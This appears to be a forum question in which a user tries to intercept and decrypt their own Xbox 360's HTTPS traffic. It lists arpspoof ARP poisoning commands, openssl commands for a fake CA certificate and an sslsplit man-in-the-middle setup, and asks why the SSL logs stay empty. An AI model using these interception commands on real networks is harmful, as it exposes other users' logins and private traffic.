I'm attempting to sniff my Xbox 360's traffic and see the cleartext data sent over HTTPS+SSL.
My xbox 360's local IP address is: 192.168.0.22.
My attacker Arch Linux box's address is: 192.168.0.18.
I have installed dsniff and SSLsplit on attacker box and am performing an ARP cache poisoning attack using the following commands simultaneous in two terminal windows:
arpspoof -i enp0s25 -t 192.168.0.1 192.168.0.22
arpspoof -i enp0s25 -t 192.168.0.22 192.168.0.1
I created a fake certificate using the following commands:
openssl genrsa -out ca.key 4096
openssl req -new -x509 -days 1826 -key ca.key -out ca.crt
I am running sslsplit like this:
sslsplit -D -l connections.log -j /var/log/sslsplit/ -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
When I login to XBL on the 360, I see non-SSL traffic over port 80 in the logs, but the SSL traffic over port 443 has log files with nothing in them (size=0KB).
My guess is there is a problem with my certificate, it's not able to verify that it has been signed by a Root CA. Do you know of a way to fix this issue?
If that's not the issue, what is and how can I fix it?
Thanks for your help.